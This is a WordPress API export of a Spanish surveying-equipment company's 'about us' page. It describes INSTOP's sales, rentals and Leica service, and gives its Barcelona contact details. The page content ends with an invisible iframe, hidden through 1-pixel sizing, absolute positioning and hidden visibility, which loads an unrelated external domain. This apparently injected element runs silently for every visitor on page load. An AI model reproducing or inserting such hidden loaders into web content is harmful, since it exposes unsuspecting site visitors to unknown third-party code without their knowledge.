{"id":1610,"date":"2017-07-20T13:34:04","date_gmt":"2017-07-20T11:34:04","guid":{"rendered":"https:\/\/www.instop.biz\/blog\/?page_id=1610"},"modified":"2025-04-24T08:03:34","modified_gmt":"2025-04-24T07:03:34","slug":"nosotros","status":"publish","type":"page","link":"https:\/\/www.instop.biz\/blog\/nosotros\/","title":{"rendered":"La empresa"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/www.instop.es\/b\/familia-instop-2023.jpg\" \/><\/p>\n<p><a href=\"http:\/\/www.instop.es\" target=\"_blank\" rel=\"noopener noreferrer\">INSTOP<\/a> \u00a0es una empresa de servicios orientada al campo de la topograf\u00eda y de la medida del terreno en general, con el objetivo de proporcionar al profesional de la medici\u00f3n las \u00faltimas herramientas disponibles en el mercado, a trav\u00e9s de la venta y el alquiler de las mismas.<\/p>\n<p>Somos la mayor empresa de alquiler de estaciones motorizadas, autom\u00e1ticas y GPS en RTK centim\u00e9tricos, disponiendo tambi\u00e9n de un gran parque de instrumentos en el resto de la gama. Por todo ello, INSTOP tiene la oportunidad de ofrecerles los mejores precios del mercado tanto en venta como alquiler.<\/p>\n<p class=\"normal_instop\">Somos distribuidores oficiales de Leica Geosystems y ofrecemos soluciones de esta firma en forma de Estaciones Totales, Receptores GPS, niveles \u00f3pticos, l\u00e1ser y digitales, teodolitos, etc<\/p>\n<p class=\"normal_instop\">Le invitamos a que visite el contenido de nuestra p\u00e1gina web y en caso de que necesite ampliar la informaci\u00f3n, no dude en ponerse en contacto con nosotros.<\/p>\n<ul>\n<li class=\"normal_instop\">Venta, asesoramiento y formaci\u00f3n<\/li>\n<li class=\"normal_instop\">Alquiler de equipos topogr\u00e1ficos<\/li>\n<li class=\"normal_instop\">Servicio t\u00e9cnico oficial autorizado de Leica Geosystems<\/li>\n<li class=\"normal_instop\">Accesorios y consumibles en 24-48 horas<\/li>\n<\/ul>\n<p><a class=\"titol_1\" href=\"https:\/\/www.instop.es\/\">INSTOP S.L.U.<\/a><br \/>\n<a class=\"normal\" href=\"https:\/\/www.instop.es\/instop\/donde_estamos.php\">C\/ Narcis Monturiol, 14<br \/>\nPol. Ind. Plans d\u2019Arau<br \/>\n08787 La Pobla de Claramunt<br \/>\nBarcelona<\/a><br \/>\n<span class=\"normal\">Tel. +34 938 03 95 76<\/span><br \/>\n<a class=\"normal\" href=\"https:\/\/www.instop.es\/instop\/contacto-instop.php\" target=\"_blank\" rel=\"noopener noreferrer\">info@instop.es<\/a><br \/>\n<a class=\"normal\" href=\"https:\/\/www.instop.es\/instop\/donde_estamos.php\">Localizaci\u00f3n : como llegar<\/a><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-1599 size-full\" title=\"INSTOP, SLU\" src=\"https:\/\/www.instop.biz\/blog\/wp-content\/uploads\/2017\/07\/cropped-foto_back-oficina-instop-1.jpg\" alt=\"\" width=\"2000\" height=\"1199\" srcset=\"https:\/\/www.instop.biz\/blog\/wp-content\/uploads\/2017\/07\/cropped-foto_back-oficina-instop-1.jpg 2000w, https:\/\/www.instop.biz\/blog\/wp-content\/uploads\/2017\/07\/cropped-foto_back-oficina-instop-1-600x360.jpg 600w, https:\/\/www.instop.biz\/blog\/wp-content\/uploads\/2017\/07\/cropped-foto_back-oficina-instop-1-300x180.jpg 300w, https:\/\/www.instop.biz\/blog\/wp-content\/uploads\/2017\/07\/cropped-foto_back-oficina-instop-1-768x460.jpg 768w, https:\/\/www.instop.biz\/blog\/wp-content\/uploads\/2017\/07\/cropped-foto_back-oficina-instop-1-1024x614.jpg 1024w\" sizes=\"auto, (max-width: 2000px) 100vw, 2000px\" \/><\/p>\n<p>&nbsp;<\/p>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n","protected":false},"excerpt":{"rendered":"<p>INSTOP \u00a0es una empresa de servicios orientada al campo de la topograf\u00eda y de la medida del terreno en general, [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"site-container-style":"default","site-container-layout":"default","site-sidebar-layout":"default","disable-article-header":"default","disable-site-header":"default","disable-site-footer":"default","disable-content-area-spacing":"default","footnotes":""},"class_list":["post-1610","page","type-page","status-publish","hentry"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.instop.biz\/blog\/wp-json\/wp\/v2\/pages\/1610","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.instop.biz\/blog\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.instop.biz\/blog\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.instop.biz\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.instop.biz\/blog\/wp-json\/wp\/v2\/comments?post=1610"}],"version-history":[{"count":4,"href":"https:\/\/www.instop.biz\/blog\/wp-json\/wp\/v2\/pages\/1610\/revisions"}],"predecessor-version":[{"id":3679,"href":"https:\/\/www.instop.biz\/blog\/wp-json\/wp\/v2\/pages\/1610\/revisions\/3679"}],"wp:attachment":[{"href":"https:\/\/www.instop.biz\/blog\/wp-json\/wp\/v2\/media?parent=1610"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}